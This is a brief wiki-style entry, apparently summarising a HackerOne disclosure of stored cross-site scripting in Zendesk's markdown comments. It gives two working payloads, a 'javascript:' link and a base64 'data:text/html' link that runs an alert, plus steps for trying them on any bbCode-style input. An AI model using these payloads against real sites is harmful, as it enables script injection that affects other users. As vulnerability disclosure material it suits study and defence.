Zendesk - Stored XSS in comments

From Hackipedia
Jump to: navigation, search
Hackerone #82725
Target: Zendesk
Target Module:
Type: XSS
Payload:
[Click here](javascript:alert(1))
Original: Link
CVE:
Archive Screenshot

Zendesk uses a bbCode type markdown system for their comment sections. In this system is is possible to create links my method of:

[Link Test](http://www.google.com)


An overlooked method of stored xss in to link to either javascrt:alert(1) or to a base64 encoded script.

How To Perform

  1. Find a place where bbCode style is used.
  2. Try the following
    1. [Link Test](javascript:alert(1))
    2. [Link Test](data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==#)